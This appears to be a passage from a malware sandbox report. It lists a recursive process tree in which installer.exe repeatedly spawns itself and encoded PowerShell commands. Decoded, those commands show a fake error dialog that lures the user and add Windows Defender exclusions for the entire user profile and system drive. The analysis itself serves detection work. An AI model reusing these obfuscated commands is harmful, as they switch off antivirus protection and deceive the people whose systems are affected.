        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        19⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6364
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        19⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6448
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        19⤵
        Checks computer location settings
        
        PID:6536
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        20⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        20⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6980
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        20⤵
        Checks computer location settings
        
        PID:6988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        21⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6248
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        21⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6160
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        21⤵
        Checks computer location settings
        
        PID:5400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        22⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6776
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        22⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6668
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        22⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:7064
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        23⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        23⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1868
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        23⤵
        Checks computer location settings
        
        PID:5204
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        24⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        24⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3232
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        24⤵
        Checks computer location settings
        
        PID:7220
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        25⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7584
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        25⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7628
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        25⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:7692
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        26⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:8024
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        26⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:8052
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        26⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:8080
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        27⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        27⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:7592
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        27⤵
        Checks computer location settings
        
        PID:7472
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        28⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7736
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        28⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:8136
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        28⤵
        Checks computer location settings
        
        PID:7708
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        29⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:8132
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        29⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:7516
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        29⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:1764
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        30⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7976
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        30⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:224
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        30⤵
        Checks computer location settings
        
        PID:3464
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        31⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:8120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        31⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4836
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        31⤵
        Checks computer location settings
        
        PID:7172
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        32⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        32⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:516
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        32⤵
        Checks computer location settings
        
        PID:4832
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        33⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:804
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
